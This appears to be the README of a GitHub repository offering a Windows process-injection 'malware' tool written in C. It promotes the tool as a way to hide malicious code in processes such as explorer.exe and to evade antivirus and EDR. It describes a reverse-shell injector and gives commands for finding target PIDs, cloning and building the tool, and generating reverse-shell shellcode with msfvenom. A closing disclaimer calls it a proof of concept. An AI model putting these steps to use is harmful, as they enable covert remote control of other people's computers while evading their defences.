Simple payload for hacking Windows and process injection. Using the windows API for the C programming language.

• Windows API: https://learn.microsoft.com/pt-br/windows/win32/apiindex/windows-api-list

Process injection is an evasive attack method, that hackers use to gain access to the system by executing their malicious code in the address space of a legitimate process, hiding the malware and often not generating any suspicion about an attacker on the system, as the malicious code becomes difficult to detect. Process injections also evade detection by any antivirus, application control, or endpoint detection and response systems running on the network, because the infected processes are viewed as legitimate.

Hackers usually use less suspicious or more important system processes such as: svchost.exe, rundll32.exe or even explorer.exe.

• Explorer_injection.exe: Performs a shell connection on the reverse target computer at the execution address of the explorer.exe process.

• How to find the PID of a running windows process:

  tasklist | findstr <process name>

=> CMD syntax: Process_injection.exe <PID>

• Installation:

git clone https://github.com/Jsmoreira02/Wind0wsM4lware_.git
cd Wind0wsM4lware_
make

• Compiling just one of the files with "Makefile": make Process_injection make Win_malware make explorer_injection

• Compiling the code (Windows): gcc code.c -o code or make (In case mingw-w64 is installed)

Debian/Ubuntu OS:

sudo apt install mingw-w64-x86-64 (64-bits)
or
sudo apt install mingw-w64 (32-bits)

Fedora:

sudo dnf install mingw64-gcc

Arch Linux:

sudo pacman -S mingw-w64-gcc

=> More Info: https://www.mingw-w64.org/

=> Shellcode generator: msfvenom -p <Payload> LHOST=<IP> LPORT=<LOCAL PORT> --platform windows --arch <x64/x86> -f c

I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept, is intended to raise awareness about cybersecurity and can be improved in many ways.